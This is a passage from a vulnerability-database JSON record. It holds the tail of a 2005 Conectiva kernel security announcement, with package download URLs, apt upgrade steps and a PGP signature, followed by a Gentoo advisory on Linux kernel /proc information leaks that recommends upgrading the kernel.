ftp://atualizacoes.conectiva.com.br/10/SRPMS/kernel26-module-hsfmodem-2.6.11.72032U10_16cl.7.18.00.03full-63167U10_5cl.src.rpm\r\nftp://atualizacoes.conectiva.com.br/10/SRPMS/lm_sensors-2.9.0-61067U10_1cl.src.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-2.6.11-72032U10_16cl.athlon.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-2.6.11-72032U10_16cl.i386.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-2.6.11-72032U10_16cl.i586.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-2.6.11-72032U10_16cl.i686.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-2.6.11-72032U10_16cl.pentium4.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-BOOT-2.6.11-72032U10_16cl.i386.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-BOOT-module-madwifi-2.6.11.72032U10_16cl.20041216-63166U10_5cl.i386.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-BOOT-module-ndiswrapper-2.6.11.72032U10_16cl.1.1-72907U10_3cl.i386.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-BOOT-module-nvidia-2.6.11.72032U10_16cl.1.0.7167-71023U10_6cl.i386.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-BOOT-module-slmodem-2.6.11.72032U10_16cl.2.9.10-63168U10_6cl.i386.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-doc-2.6.11-72032U10_16cl.i386.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-enterprise-2.6.11-72032U10_16cl.athlon.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-enterprise-2.6.11-72032U10_16cl.i686.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-enterprise-2.6.11-72032U10_16cl.pentium4.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-enterprise-module-madwifi-2.6.11.72032U10_16cl.20041216-63166U10_5cl.athlon.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-enterprise-module-madwifi-2.6.11.72032U10_16cl.20041216-63166U10_5cl.i686.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-enterprise-module-madwifi-2.6.11.72032U10_16cl.20041216-63166U10_5cl.pentium4.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-enterprise-module-ndiswrapper-2.6.11.72032U10_16cl.1.1-72907U10_3cl.athlon.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-enterprise-module-ndiswrapper-2.6.11.72032U10_16cl.1.1-72907U10_3cl.i686.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-enterprise-module-ndiswrapper-2.6.11.72032U10_16cl.1.1-72907U10_3cl.pentium4.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-enterprise-module-nvidia-2.6.11.72032U10_16cl.1.0.7167-71023U10_6cl.athlon.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-enterprise-module-nvidia-2.6.11.72032U10_16cl.1.0.7167-71023U10_6cl.i686.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-enterprise-module-nvidia-2.6.11.72032U10_16cl.1.0.7167-71023U10_6cl.pentium4.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-enterprise-module-slmodem-2.6.11.72032U10_16cl.2.9.10-63168U10_6cl.athlon.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-enterprise-module-slmodem-2.6.11.72032U10_16cl.2.9.10-63168U10_6cl.i686.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-enterprise-module-slmodem-2.6.11.72032U10_16cl.2.9.10-63168U10_6cl.pentium4.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-enterprise-module-hsfmodem-2.6.11.72032U10_16cl.7.18.00.03full-63167U10_5cl.athlon.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-enterprise-module-hsfmodem-2.6.11.72032U10_16cl.7.18.00.03full-63167U10_5cl.pentium4.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-enterprise-module-hsfmodem-2.6.11.72032U10_16cl.7.18.00.03full-63167U10_5cl.i686.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-highmem-2.6.11-72032U10_16cl.athlon.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-highmem-2.6.11-72032U10_16cl.i686.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-highmem-2.6.11-72032U10_16cl.pentium4.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-BOOT-module-hsfmodem-2.6.11.72032U10_16cl.7.18.00.03full-63167U10_5cl.i386.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-highmem-module-madwifi-2.6.11.72032U10_16cl.20041216-63166U10_5cl.athlon.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-highmem-module-madwifi-2.6.11.72032U10_16cl.20041216-63166U10_5cl.i686.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-highmem-module-madwifi-2.6.11.72032U10_16cl.20041216-63166U10_5cl.pentium4.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-highmem-module-ndiswrapper-2.6.11.72032U10_16cl.1.1-72907U10_3cl.athlon.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-highmem-module-ndiswrapper-2.6.11.72032U10_16cl.1.1-72907U10_3cl.i686.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-highmem-module-ndiswrapper-2.6.11.72032U10_16cl.1.1-72907U10_3cl.pentium4.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-highmem-module-nvidia-2.6.11.72032U10_16cl.1.0.7167-71023U10_6cl.athlon.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-highmem-module-nvidia-2.6.11.72032U10_16cl.1.0.7167-71023U10_6cl.i686.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-highmem-module-nvidia-2.6.11.72032U10_16cl.1.0.7167-71023U10_6cl.pentium4.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-highmem-module-slmodem-2.6.11.72032U10_16cl.2.9.10-63168U10_6cl.athlon.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-highmem-module-slmodem-2.6.11.72032U10_16cl.2.9.10-63168U10_6cl.i686.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-highmem-module-slmodem-2.6.11.72032U10_16cl.2.9.10-63168U10_6cl.pentium4.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-highmem-smp-2.6.11-72032U10_16cl.athlon.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-highmem-smp-2.6.11-72032U10_16cl.i686.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-highmem-smp-2.6.11-72032U10_16cl.pentium4.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-highmem-smp-module-madwifi-2.6.11.72032U10_16cl.20041216-63166U10_5cl.athlon.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-highmem-smp-module-madwifi-2.6.11.72032U10_16cl.20041216-63166U10_5cl.i686.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-highmem-smp-module-madwifi-2.6.11.72032U10_16cl.20041216-63166U10_5cl.pentium4.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-highmem-smp-module-ndiswrapper-2.6.11.72032U10_16cl.1.1-72907U10_3cl.athlon.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-highmem-smp-module-ndiswrapper-2.6.11.72032U10_16cl.1.1-72907U10_3cl.i686.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-highmem-smp-module-ndiswrapper-2.6.11.72032U10_16cl.1.1-72907U10_3cl.pentium4.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-highmem-smp-module-nvidia-2.6.11.72032U10_16cl.1.0.7167-71023U10_6cl.athlon.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-highmem-smp-module-nvidia-2.6.11.72032U10_16cl.1.0.7167-71023U10_6cl.i686.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-highmem-smp-module-nvidia-2.6.11.72032U10_16cl.1.0.7167-71023U10_6cl.pentium4.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-highmem-smp-module-slmodem-2.6.11.72032U10_16cl.2.9.10-63168U10_6cl.athlon.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-highmem-smp-module-slmodem-2.6.11.72032U10_16cl.2.9.10-63168U10_6cl.i686.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-highmem-smp-module-slmodem-2.6.11.72032U10_16cl.2.9.10-63168U10_6cl.pentium4.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-highmem-module-hsfmodem-2.6.11.72032U10_16cl.7.18.00.03full-63167U10_5cl.pentium4.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-highmem-module-hsfmodem-2.6.11.72032U10_16cl.7.18.00.03full-63167U10_5cl.athlon.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-highmem-module-hsfmodem-2.6.11.72032U10_16cl.7.18.00.03full-63167U10_5cl.i686.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-module-hsfmodem-2.6.11.72032U10_16cl.7.18.00.03full-63167U10_5cl.athlon.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-module-madwifi-2.6.11.72032U10_16cl.20041216-63166U10_5cl.athlon.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-module-madwifi-2.6.11.72032U10_16cl.20041216-63166U10_5cl.i386.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-module-madwifi-2.6.11.72032U10_16cl.20041216-63166U10_5cl.i586.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-module-madwifi-2.6.11.72032U10_16cl.20041216-63166U10_5cl.i686.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-module-madwifi-2.6.11.72032U10_16cl.20041216-63166U10_5cl.pentium4.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-module-ndiswrapper-2.6.11.72032U10_16cl.1.1-72907U10_3cl.athlon.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-module-ndiswrapper-2.6.11.72032U10_16cl.1.1-72907U10_3cl.i386.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-module-ndiswrapper-2.6.11.72032U10_16cl.1.1-72907U10_3cl.i586.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-module-ndiswrapper-2.6.11.72032U10_16cl.1.1-72907U10_3cl.i686.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-module-ndiswrapper-2.6.11.72032U10_16cl.1.1-72907U10_3cl.pentium4.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-module-nvidia-2.6.11.72032U10_16cl.1.0.7167-71023U10_6cl.athlon.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-module-nvidia-2.6.11.72032U10_16cl.1.0.7167-71023U10_6cl.i386.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-module-nvidia-2.6.11.72032U10_16cl.1.0.7167-71023U10_6cl.i586.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-module-nvidia-2.6.11.72032U10_16cl.1.0.7167-71023U10_6cl.i686.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-module-nvidia-2.6.11.72032U10_16cl.1.0.7167-71023U10_6cl.pentium4.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-module-slmodem-2.6.11.72032U10_16cl.2.9.10-63168U10_6cl.athlon.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-module-slmodem-2.6.11.72032U10_16cl.2.9.10-63168U10_6cl.i386.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-module-slmodem-2.6.11.72032U10_16cl.2.9.10-63168U10_6cl.i586.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-module-slmodem-2.6.11.72032U10_16cl.2.9.10-63168U10_6cl.i686.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-module-slmodem-2.6.11.72032U10_16cl.2.9.10-63168U10_6cl.pentium4.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-smp-2.6.11-72032U10_16cl.athlon.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-smp-2.6.11-72032U10_16cl.i386.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-smp-2.6.11-72032U10_16cl.i586.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-smp-2.6.11-72032U10_16cl.i686.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-smp-2.6.11-72032U10_16cl.pentium4.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-source-2.6.11-72032U10_16cl.i386.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-highmem-smp-module-hsfmodem-2.6.11.72032U10_16cl.7.18.00.03full-63167U10_5cl.pentium4.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-highmem-smp-module-hsfmodem-2.6.11.72032U10_16cl.7.18.00.03full-63167U10_5cl.athlon.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-highmem-smp-module-hsfmodem-2.6.11.72032U10_16cl.7.18.00.03full-63167U10_5cl.i686.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-smp-module-madwifi-2.6.11.72032U10_16cl.20041216-63166U10_5cl.athlon.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-smp-module-madwifi-2.6.11.72032U10_16cl.20041216-63166U10_5cl.i386.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-smp-module-madwifi-2.6.11.72032U10_16cl.20041216-63166U10_5cl.i586.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-smp-module-madwifi-2.6.11.72032U10_16cl.20041216-63166U10_5cl.i686.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-smp-module-madwifi-2.6.11.72032U10_16cl.20041216-63166U10_5cl.pentium4.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-smp-module-ndiswrapper-2.6.11.72032U10_16cl.1.1-72907U10_3cl.athlon.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-smp-module-ndiswrapper-2.6.11.72032U10_16cl.1.1-72907U10_3cl.i386.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-smp-module-ndiswrapper-2.6.11.72032U10_16cl.1.1-72907U10_3cl.i586.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-smp-module-ndiswrapper-2.6.11.72032U10_16cl.1.1-72907U10_3cl.i686.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-smp-module-ndiswrapper-2.6.11.72032U10_16cl.1.1-72907U10_3cl.pentium4.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-smp-module-nvidia-2.6.11.72032U10_16cl.1.0.7167-71023U10_6cl.athlon.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-smp-module-nvidia-2.6.11.72032U10_16cl.1.0.7167-71023U10_6cl.i386.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-smp-module-nvidia-2.6.11.72032U10_16cl.1.0.7167-71023U10_6cl.i586.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-smp-module-nvidia-2.6.11.72032U10_16cl.1.0.7167-71023U10_6cl.i686.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-smp-module-nvidia-2.6.11.72032U10_16cl.1.0.7167-71023U10_6cl.pentium4.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-smp-module-slmodem-2.6.11.72032U10_16cl.2.9.10-63168U10_6cl.athlon.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-smp-module-slmodem-2.6.11.72032U10_16cl.2.9.10-63168U10_6cl.i386.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-smp-module-slmodem-2.6.11.72032U10_16cl.2.9.10-63168U10_6cl.i586.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-smp-module-slmodem-2.6.11.72032U10_16cl.2.9.10-63168U10_6cl.i686.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-smp-module-slmodem-2.6.11.72032U10_16cl.2.9.10-63168U10_6cl.pentium4.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-BOOT-module-drbd-2.6.11.72032U10_16cl.0.7.10-71801U10_5cl.i386.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-enterprise-module-drbd-2.6.11.72032U10_16cl.0.7.10-71801U10_5cl.athlon.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-enterprise-module-drbd-2.6.11.72032U10_16cl.0.7.10-71801U10_5cl.i686.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-highmem-module-drbd-2.6.11.72032U10_16cl.0.7.10-71801U10_5cl.athlon.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-enterprise-module-drbd-2.6.11.72032U10_16cl.0.7.10-71801U10_5cl.pentium4.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-highmem-module-drbd-2.6.11.72032U10_16cl.0.7.10-71801U10_5cl.i686.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-module-drbd-2.6.11.72032U10_16cl.0.7.10-71801U10_5cl.athlon.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-highmem-module-drbd-2.6.11.72032U10_16cl.0.7.10-71801U10_5cl.pentium4.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-highmem-smp-module-drbd-2.6.11.72032U10_16cl.0.7.10-71801U10_5cl.athlon.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-highmem-smp-module-drbd-2.6.11.72032U10_16cl.0.7.10-71801U10_5cl.i686.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-highmem-smp-module-drbd-2.6.11.72032U10_16cl.0.7.10-71801U10_5cl.pentium4.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-module-drbd-2.6.11.72032U10_16cl.0.7.10-71801U10_5cl.i386.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-module-drbd-2.6.11.72032U10_16cl.0.7.10-71801U10_5cl.i586.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-module-drbd-2.6.11.72032U10_16cl.0.7.10-71801U10_5cl.i686.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-module-drbd-2.6.11.72032U10_16cl.0.7.10-71801U10_5cl.pentium4.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-smp-module-drbd-2.6.11.72032U10_16cl.0.7.10-71801U10_5cl.athlon.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-smp-module-drbd-2.6.11.72032U10_16cl.0.7.10-71801U10_5cl.i386.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-smp-module-drbd-2.6.11.72032U10_16cl.0.7.10-71801U10_5cl.i586.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-smp-module-drbd-2.6.11.72032U10_16cl.0.7.10-71801U10_5cl.i686.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-smp-module-drbd-2.6.11.72032U10_16cl.0.7.10-71801U10_5cl.pentium4.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-module-hsfmodem-2.6.11.72032U10_16cl.7.18.00.03full-63167U10_5cl.pentium4.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-module-hsfmodem-2.6.11.72032U10_16cl.7.18.00.03full-63167U10_5cl.i386.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-module-hsfmodem-2.6.11.72032U10_16cl.7.18.00.03full-63167U10_5cl.i586.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-module-hsfmodem-2.6.11.72032U10_16cl.7.18.00.03full-63167U10_5cl.i686.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-smp-module-hsfmodem-2.6.11.72032U10_16cl.7.18.00.03full-63167U10_5cl.pentium4.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-smp-module-hsfmodem-2.6.11.72032U10_16cl.7.18.00.03full-63167U10_5cl.athlon.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-smp-module-hsfmodem-2.6.11.72032U10_16cl.7.18.00.03full-63167U10_5cl.i386.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-smp-module-hsfmodem-2.6.11.72032U10_16cl.7.18.00.03full-63167U10_5cl.i586.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/kernel26-smp-module-hsfmodem-2.6.11.72032U10_16cl.7.18.00.03full-63167U10_5cl.i686.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/drbd-utils-0.7.10-71689U10_2cl.i386.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/drbd-utils-heartbeat-0.7.10-71689U10_2cl.i386.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/lm_sensors-2.9.0-61067U10_1cl.i386.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/lm_sensors-sensord-2.9.0-61067U10_1cl.i386.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/lm_sensors-tellerstats-2.9.0-61067U10_1cl.i386.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/liblm_sensors3-2.9.0-61067U10_1cl.i386.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/lm_sensors-doc-2.9.0-61067U10_1cl.i386.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/lm_sensors-devel-2.9.0-61067U10_1cl.i386.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/lm_sensors-devel-static-2.9.0-61067U10_1cl.i386.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/ndiswrapper-utils-2.6.11.72032U10_16cl.1.1-72907U10_3cl.i386.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/slmodemd-2.6.11.72032U10_16cl.2.9.10-63168U10_6cl.i386.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/hsfmodem-progs-2.6.11.72032U10_16cl.7.18.00.03full-63167U10_5cl.i386.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/libgl1-nvidia-1.0.7167-71010U10_2cl.i386.rpm\r\nftp://atualizacoes.conectiva.com.br/10/RPMS/xfree86-driver-nvidia-1.0.7167-71010U10_2cl.i386.rpm\r\n\r\n\r\nADDITIONAL INSTRUCTIONS\r\n The apt tool can be used to perform RPM packages upgrades:\r\n\r\n - run: apt-get update\r\n - after that, execute: apt-get upgrade\r\n\r\n Detailed instructions regarding the use of apt and upgrade examples \r\n can be found at http://distro.conectiva.com.br/atualizacoes/#apt?idioma=en\r\n\r\n- -------------------------------------------------------------------------\r\nAll packages are signed with Conectiva's GPG key. The key and instructions\r\non how to import it can be found at \r\nhttp://distro.conectiva.com.br/seguranca/chave/?idioma=en\r\nInstructions on how to check the signatures of the RPM packages can be\r\nfound at http://distro.conectiva.com.br/seguranca/politica/?idioma=en\r\n\r\n- -------------------------------------------------------------------------\r\nAll our advisories and generic update instructions can be viewed at\r\nhttp://distro.conectiva.com.br/atualizacoes/?idioma=en\r\n\r\n- -------------------------------------------------------------------------\r\nCopyright (c) 2004 Conectiva Inc.\r\nhttp://www.conectiva.com\r\n\r\n- -------------------------------------------------------------------------\r\nsubscribe: conectiva-updates-subscribe@papaleguas.conectiva.com.br\r\nunsubscribe: conectiva-updates-unsubscribe@papaleguas.conectiva.com.br\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.0.6 (GNU/Linux)\r\nComment: For info see http://www.gnupg.org\r\n\r\niD8DBQFCTBdQ42jd0JmAcZARAjzaAJ9H+zayl5Pzo6I0/Lyx56fNIvqrxgCfSFRD\r\nzof3kyHyUCWboXUbHEz9HXg=\r\n=/gGQ\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2005-04-01T00:00:00", "published": "2005-04-01T00:00:00", "id": "SECURITYVULNS:DOC:8194", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:8194", "title": "[CLA-2005:945] Conectiva Security Announcement - kernel", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:40", "bulletinFamily": "unix", "cvelist": ["CVE-2004-1058", "CVE-2004-0685", "CVE-2004-0415"], "edition": 1, "description": "### Background\n\nThe Linux kernel is responsible for managing the core aspects of a GNU/Linux system, providing an interface for core system applications as well as providing the essential structure and capability to access hardware that is needed for a running system. \n\n### Description\n\nThe Linux kernel allows a local attacker to obtain sensitive kernel information by gaining access to kernel memory via several leaks in the /proc interfaces. These vulnerabilities exist in various drivers which make up a working Linux kernel, some of which are present across all architectures and configurations. \n\nCAN-2004-0415 deals with addressing invalid 32 to 64 bit conversions in the kernel, as well as insecure direct access to file offset pointers in kernel code which can be modified by the open(...), lseek(...) and other core system I/O functions by an attacker. \n\nCAN-2004-0685 deals with certain USB drivers using uninitialized structures and then using the copy_to_user(...) kernel call to copy these structures. This may leak uninitialized kernel memory, which can contain sensitive information from user applications. \n\nFinally, a race condition with the /proc/.../cmdline node was found, allowing environment variables to be read while the process was still spawning. If the race is won, environment variables of the process, which might not be owned by the attacker, can be read. \n\n### Impact\n\nThese vulnerabilities allow a local unprivileged attacker to access segments of kernel memory or environment variables which may contain sensitive information. Kernel memory may contain passwords, data transferred between processes and any memory which applications did not clear upon exiting as well as the kernel cache and kernel buffers. \n\nThis information may be used to read sensitive data, open other attack vectors for further exploitation or cause a Denial of Service if the attacker can gain superuser access via the leaked information. \n\n### Workaround\n\nThere is no temporary workaround for any of these information leaks other than totally disabling /proc support - otherwise, a kernel upgrade is required. A list of unaffected kernels is provided along with this announcement. \n\n### Resolution\n\nUsers are encouraged to upgrade to the latest available sources for their system: \n \n \n # emerge sync\n # emerge -pv your-favorite-sources\n # emerge your-favorite-sources\n \n # # Follow usual procedure for compiling and installing a kernel.\n # # If you use genkernel, run genkernel as you would normally.", "modified": "2011-03-27T00:00:00", "published": "2004-08-25T00:00:00", "id": "GLSA-200408-24", "href": "https://security.gentoo.org/glsa/200408-24", "type": "gentoo", "title": "Linux Kernel: Multiple information leaks", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}